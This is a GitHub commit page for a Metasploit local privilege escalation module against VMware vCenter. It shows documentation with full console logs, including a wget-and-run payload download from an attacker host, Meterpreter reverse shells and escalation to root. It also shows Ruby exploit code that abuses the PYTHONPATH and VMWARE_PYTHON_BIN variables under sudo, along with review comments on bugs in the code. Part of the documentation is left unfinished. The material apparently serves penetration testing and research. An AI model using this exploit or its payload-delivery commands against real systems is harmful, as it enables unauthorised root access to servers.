operator working
h00die committed Nov 19, 2024
1 parent f38661d commit 6bd049e
Showing 2 changed files with 167 additions and 14 deletions.
136 changes: 136 additions & 0 deletions documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md
Expand Up @@ -131,3 +131,139 @@ Server username: root
(Meterpreter 1)(/tmp) > getuid
Server username: pod
```

#### Operator Group

If the user `mal` exists, use that. If not, follow the bellow instructions

Make a user in the operator group:

```
sudo useradd -m -s /bin/bash operator1
sudo usermod -aG users operator1
sudo usermod -aG operator operator1
```

This may be enough, but on my install which didn't complete I had to add the sudo entry manually.

```
visudo
```

Add the following at the end:

```
User_Alias PYTHON_USERS = operator1
Defaults:PYTHON_USERS env_keep += "PYTHONPATH"
```

Start our first handler

```
[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
lhost => 2.2.2.2
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
srvport => 8181
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
target => 7
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Using URL: http://2.2.2.2:8181/eEgibKL2K
[*] Server started.
[*] Run the following command on the target machine:
wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x JSlY5cPV; ./JSlY5cPV& disown
[*] Sending stage (3045380 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
```

Priv Esc

```
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2
lhost => 2.2.2.2
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870
lport => 9870
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set verbose true
verbose => true
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false
autocheck => false
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run
[*] Started reverse TCP handler on 2.2.2.2:9870
[!] AutoCheck is disabled, proceeding with exploitation
[*] Utilizing PYTHONPATH exploitation method for operator group.
[*] Writing '/tmp/Ma5gGdnt' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 1.1.1.1
[+] Deleted /tmp/Ma5gGdnt
[+] Deleted /tmp/spwd.py
[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:40550) at 2024-11-18 16:27:28 -0500
(Meterpreter 2)(/tmp) >
(Meterpreter 2)(/tmp) > getuid
Server username: root
(Meterpreter 2)(/tmp) > background
[*] Backgrounding session 2...
s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > getuid
Server username: operator1
```

#### Admin Group

If the user `admin` exists, use that. If not, follow the bellow instructions

Make a user in the operator group:

```
sudo useradd -m -s /bin/bash admin
sudo usermod -aG admin admin
sudo usermod -aG users admin
```

Start our first handler

```
[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
lhost => 2.2.2.2
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
srvport => 8181
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
target => 7
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Using URL: http://2.2.2.2:8181/Hul7qG
[*] Server started.
[*] Run the following command on the target machine:
wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x IsMq60f5; ./IsMq60f5& disown
[*] Sending stage (3045380 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
```

Priv Esc

```
```


XXX to be completed
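Review bot: "bellow" should be "below" in both the Operator Group and Admin Group intros, and the Admin Group section repeats "Make a user in the operator group:" above commands that add the new user to `admin`. The `sessions -i 1` prompt carries a stray leading `s` (`s[msf](Jobs:1 Agents:2)`), and the Admin Group "Priv Esc" block is an empty fence followed by "XXX to be completed", so this part of the page ships unfinished. Since the module now runs `sudo PYTHONPATH=#{base_dir} #{vuln_exe}`, the `Defaults:PYTHON_USERS env_keep += "PYTHONPATH"` sudoers entry is the precondition the operator-group path depends on rather than an optional extra; the doc should state that instead of "This may be enough".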
45 changes: 31 additions & 14 deletions modules/exploits/linux/local/vcenter_sudo_lpe.rb
Expand Up @@ -70,52 +70,61 @@ def check
# we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS
# technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead
return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild

vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}")

return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d
(vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r
(vbuild_version > Rex::Version.new('7.0.0') && vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r

vprint_good("Exploitable version detected: #{vbuild_version}")

@user = cmd_exec('whoami').chomp
@groups = cmd_exec('groups').chomp.split(' ')
if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any?
vprint_good("User is vulnerable")
vprint_good('User is vulnerable')
else
return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})")
end

CheckCode::Appears("System seems exploitable")
CheckCode::Appears('System seems exploitable')
end

def exploit_operator_group
# for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we
# modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution
vprint_status("Utilizing PYTHONPATH exploitation method for operator group.")
vprint_status('Utilizing PYTHONPATH exploitation method for operator group.')
vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py'

return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe
return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe

# Upload payload executable
payload_path = "#{base_dir}/spwd.py"
payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)

# Upload payload stub
payload_stub = "#{base_dir}/spwd.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)

timeout = 30
print_status 'Launching exploit...'
output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout
output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
end

def exploit_pod_user
# for this exploit we abuse install-parametery as it does a 'from appliance...', so if we
# modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution
vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.")
vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.')
mkdir("#{base_dir}/appliance")


# Upload payload executable
payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)

# Upload payload stub
payload_stub = "#{base_dir}/appliance/__init__.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)
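Review bot: the unchanged `check` line `if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any?` still calls `contains?` on an Array (Ruby only has `include?`) and references the undefined locals `user` and `group` instead of `@user` and `@groups`, so `check` raises on any host that passes the version gate; the `contains?` to `include?` fix this commit applies in `exploit` belongs here too, along with `#{@user}:#{@groups}` in the `CheckCode::Safe` message. Separately, `return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe` returns a two-element array from `exploit_operator_group` rather than aborting the run; `fail_with(Failure::NotFound, "...")` is the framework idiom.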
Expand All @@ -129,14 +138,22 @@ def exploit_pod_user
def exploit_admin_group
# for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN
# so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution
vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.")
vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.')
mkdir("#{base_dir}/appliance")
payload_path = "#{base_dir}/__init__.py"

# Upload payload executable
payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)

# Upload payload stub
payload_stub = "#{base_dir}/appliance/__init__.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)

timeout = 30
print_status 'Launching exploit...'
output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout
output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout
output.each_line { |line| vprint_status line.chomp }
end

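Review bot: the `__init__.py` stub and the `appliance` directory added to `exploit_admin_group` are never used by this path: `/bin/dcli` is run with `VMWARE_PYTHON_BIN=#{payload_path}` pointing straight at the uploaded executable, so `mkdir("#{base_dir}/appliance")`, `payload_stub` and its `write_file` appear to be copied from `exploit_pod_user` and only leave extra files behind. Drop them (the new `payload_path` assignment and `upload_and_chmodx` are all dcli needs), or add a comment explaining why dcli requires the stub. In both methods the directory created by `mkdir` is also not registered for cleanup, unlike the files inside it.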
Expand All @@ -145,9 +162,9 @@ def exploit
@groups = cmd_exec('groups').chomp.split(' ') if @groups.nil?
if @user == 'pod'
exploit_pod_user
elsif @group.contains? 'operator'
elsif @groups.include? 'operator'
exploit_operator_group
elsif @group.contains? 'admin'
elsif @groups.include? 'admin'
exploit_admin_group
end
end
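Review bot: the dispatch in `exploit` has no fallthrough branch: when `@user` is not `pod` and `@groups` contains neither `operator` nor `admin` (reachable when `autocheck` is set to false, as the documentation does), the method returns silently with no session and no error message; add an `else` that calls `fail_with(Failure::NoTarget, ...)` naming the user and groups. The `@groups.include?` correction made here also needs to be mirrored in `check`, which still uses `contains?` on the same data.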

0 comments on commit 6bd049e